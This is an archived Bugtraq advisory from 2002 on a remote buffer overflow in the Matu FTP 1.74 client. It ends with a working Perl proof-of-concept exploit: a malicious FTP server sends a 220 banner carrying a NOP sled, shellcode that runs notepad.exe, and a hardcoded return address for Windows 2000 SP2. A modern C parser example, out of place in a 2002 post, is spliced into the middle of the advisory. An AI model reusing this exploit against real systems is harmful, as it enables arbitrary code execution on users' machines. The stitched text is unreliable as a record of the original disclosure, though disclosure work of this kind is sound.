Bugtraq mailing list archives

Matu FTP remote buffer overflow vulnerability


From: Kanatoko <anvil () jumperz net>
Date: Mon, 22 Apr 2002 18:45:46 +0900


Matu FTP remote buffer overflow vulnerability

/*---------------------------
 Description
---------------------------*/
Matu FTP is a Japanese FTP client for the Win32 platform.
We found an exploitable buffer overflow in Matu FTP version 1.74.
The buffer overflow occurs when a long string like

220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>

is received by Matu FTP at the beginning of an FTP session.
This vulnerability allows a malicious FTP server to execute
arbitrary code on client hosts.
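The defensive counterpart of this bug is a client that never copies a reply line into fixed storage without first bounding it. The following C example is added here for illustration; it is not code from the advisory or from Matu FTP. It parses one RFC 959 reply line ("ddd " or "ddd-" followed by text and CRLF) from the bytes received so far, stops scanning at an assumed client-side limit (FTP_LINE_MAX, chosen here as 256 bytes), and reports an over-long line as an error to be handled by dropping the connection rather than by truncating or overflowing. The names ftp_parse_reply, ftp_status and ftp_reply are hypothetical; the sample banners in main() are constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed client-side bound on one reply line, CRLF included. RFC 959 sets
 * no maximum, so the client has to impose one before copying anything into
 * fixed-size storage. */
#define FTP_LINE_MAX 256

enum ftp_status {
    FTP_OK = 0,
    FTP_ERR_NO_CRLF,     /* no terminator yet and the bound is not reached: read more */
    FTP_ERR_TOO_LONG,    /* FTP_LINE_MAX bytes without CRLF: reject, drop the connection */
    FTP_ERR_BAD_FORMAT   /* line does not start with "ddd " or "ddd-" */
};

struct ftp_reply {
    int code;                 /* three-digit reply code, e.g. 220 */
    int more;                 /* 1 for the "ddd-" multi-line continuation form */
    char text[FTP_LINE_MAX];  /* reply text without code or CRLF, NUL-terminated */
};

/* Parse one reply line from the bytes received so far (buf, len).
 * On FTP_OK, *consumed is the number of bytes the line used, CRLF included,
 * so the caller can advance to the next line in the same buffer. */
enum ftp_status ftp_parse_reply(const char *buf, size_t len,
                                struct ftp_reply *out, size_t *consumed)
{
    size_t limit = len < FTP_LINE_MAX ? len : FTP_LINE_MAX;
    size_t i;

    /* Look for CRLF, never scanning past the bound however much has arrived. */
    for (i = 0; i + 1 < limit; i++) {
        if (buf[i] == '\r' && buf[i + 1] == '\n')
            break;
    }
    if (i + 1 >= limit)
        return len >= FTP_LINE_MAX ? FTP_ERR_TOO_LONG : FTP_ERR_NO_CRLF;

    /* buf[0..i) is the line body; it must begin with a code and a separator. */
    if (i < 4 || !isdigit((unsigned char)buf[0]) || !isdigit((unsigned char)buf[1])
        || !isdigit((unsigned char)buf[2]) || (buf[3] != ' ' && buf[3] != '-'))
        return FTP_ERR_BAD_FORMAT;

    out->code = (buf[0] - '0') * 100 + (buf[1] - '0') * 10 + (buf[2] - '0');
    out->more = (buf[3] == '-');

    /* i < FTP_LINE_MAX - 1 here, so i - 4 text bytes plus the NUL always fit. */
    memcpy(out->text, buf + 4, i - 4);
    out->text[i - 4] = '\0';
    *consumed = i + 2;
    return FTP_OK;
}

static const char *status_name(enum ftp_status s)
{
    switch (s) {
    case FTP_OK:             return "ok";
    case FTP_ERR_NO_CRLF:    return "need more data";
    case FTP_ERR_TOO_LONG:   return "too long, reject";
    case FTP_ERR_BAD_FORMAT: return "malformed";
    }
    return "?";
}

int main(void)
{
    /* Constructed samples: a normal greeting and an over-long one of the
     * shape the advisory describes (plain filler, nothing else). */
    static const char greeting[] = "220 Constructed test banner\r\n";
    static char oversized[400];
    struct ftp_reply r;
    size_t used = 0;
    enum ftp_status s;

    memset(oversized, 'A', sizeof oversized);
    memcpy(oversized, "220 ", 4);

    s = ftp_parse_reply(greeting, sizeof greeting - 1, &r, &used);
    printf("%-16s code=%d text=\"%s\" used=%zu\n", status_name(s), r.code, r.text, used);

    s = ftp_parse_reply(oversized, sizeof oversized, &r, &used);
    printf("%-16s (bound %d bytes)\n", status_name(s), FTP_LINE_MAX);
    return 0;
}
```

The important property is that the scan limit is applied before any copy: the only memcpy in the function runs after the CRLF has been found inside the bound, so the destination size is guaranteed by construction rather than by trusting the server.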


/*---------------------------
 Vendor Status
---------------------------*/
The vendor was notified; no response was received.


/*---------------------------
 POC
---------------------------*/
This exploit code is invoked as an FTP server through inetd.

#!/usr/local/bin/perl

#------------------------------------------------------
# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko <anvil () jumperz net>
# http://www.jumperz.net/
#------------------------------------------------------
$|=1;

        #egg written by UNYUN (http://www.shadowpenguin.org/)
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

        #egg_address = 0x0012F43C
$buf = "\x90" x 217;
$buf .= $egg;
$buf .= "A" x 2;
$buf .= "\x3C\xF4\x12\x00";
$buf .= "B" x 80;

print "220 $buf\r\n";

--

#sorry for the bad english

Kanatoko <anvil () jumperz net>
http://www.jumperz.net/(Japanese)
